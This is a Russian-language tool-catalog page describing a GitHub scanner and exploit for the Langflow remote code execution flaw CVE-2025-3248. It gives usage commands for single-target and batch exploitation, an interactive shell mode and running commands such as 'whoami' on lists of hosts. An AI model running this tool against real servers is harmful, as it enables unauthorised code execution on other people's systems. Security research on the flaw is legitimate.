Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-3248 — Langflow при выполнении AST-разбора и компиляции «кода проверки», отправленного пользователем, вызывает Python `compile()`/`exec()` без аутентификации и ограничений песочницы (а на этапе компиляции оцениваются значения аргументов по умолчанию и декораторы). Злоумышленник может поместить вредоносную нагрузку в значения аргументов по умолчанию или в декораторы и таким образом выполнить произвольные операторы в контексте сервера (reverse shell, загрузчики, горизонтальное перемещение и т. д.). | Kitploit
Инструменты/GitHubGitHub/bambooqj/cve-2025-3248
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubbambooqj/cve-2025-3248

cve-2025-3248

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Langflow при выполнении AST-разбора и компиляции «кода проверки», отправленного пользователем, вызывает Python `compile()`/`exec()` без аутентификации и ограничений песочницы (а на этапе компиляции оцениваются значения аргументов по умолчанию и декораторы). Злоумышленник может поместить вредоносную нагрузку в значения аргументов по умолчанию или в декораторы и таким образом выполнить произвольные операторы в контексте сервера (reverse shell, загрузчики, горизонтальное перемещение и т. д.).

Поделиться

CVE-2025-3248 Langflow RCE Scanner

Инструмент на Python для сканирования и эксплуатации уязвимости CVE-2025-3248, которая позволяет выполнять удалённый код (RCE) в приложениях Langflow.

Возможности

  • Сканирование одиночной цели и выполнение команд
  • Пакетное сканирование URL
  • Интерактивный режим shell
  • Многопоточная пакетная обработка
  • Подробный вывод и обработка ошибок
  • Сохранение результатов в файл

Установка зависимостей

root@kitploit:~
pip install requests

Использование

Сканирование одиночной цели (вход в интерактивный shell)

root@kitploit:~
python cve-2025-3248.py http://target:port

Выполнение команды на одиночной цели

root@kitploit:~
python cve-2025-3248.py http://target:port -c "id"

Пакетное сканирование

root@kitploit:~
python cve-2025-3248.py -f urls.txt

Пакетное выполнение команд

root@kitploit:~
python cve-2025-3248.py -f urls.txt -c "whoami"

Дополнительные параметры

root@kitploit:~
python cve-2025-3248.py -f urls.txt -t 20 --timeout 15 -v

Описание параметров

  • url: Целевой URL (например: http://10.10.10.1:7860)
  • -f, --file: Файл со списком URL, по одному на строку
  • -c, --cmd: Команда для выполнения (например: id, whoami)
  • --timeout: Таймаут запроса, по умолчанию 10 секунд
  • -t, --threads: Количество потоков для пакетного сканирования, по умолчанию 10
  • -v, --verbose: Подробный режим, показывает исходный ответ

Примеры

Пример 1: Сканирование одиночной цели

root@kitploit:~
python cve-2025-3248.py http://192.168.1.100:7860

Пример 2: Выполнение конкретной команды

root@kitploit:~
python cve-2025-3248.py http://192.168.1.100:7860 -c "ls -la"

Пример 3: Пакетное сканирование нескольких целей

Создайте файл targets.txt:

root@kitploit:~
http://192.168.1.100:7860
http://192.168.1.101:7860
http://192.168.1.102:7860

Затем выполните:

root@kitploit:~
python cve-2025-3248.py -f targets.txt

Пример 4: Пакетное выполнение команд

root@kitploit:~
python cve-2025-3248.py -f targets.txt -c "uname -a" -t 5

Пояснение к выводу

  • [+] Успешное выполнение
  • [-] Ошибка или сбой
  • [!] Предупреждение
  • [*] Информационный вывод

Файл результатов

Успешно просканированные цели сохраняются в файл vulnerable_targets.txt или vulnerable_targets_{command}.txt.

Отказ от ответственности

Данный инструмент предназначен только для исследований в области безопасности и образовательных целей. Пользователь несёт ответственность за свои действия. Несанкционированное тестирование систем может нарушать законодательство.

Автор

  • bambooqj
  • GitHub: github.com/bambooqj

Ссылки

  • CVE-2025-3248
  • Эталонная реализация: ynsmroztas/CVE-2025-3248-Langflow-RCE
Скачать инструмент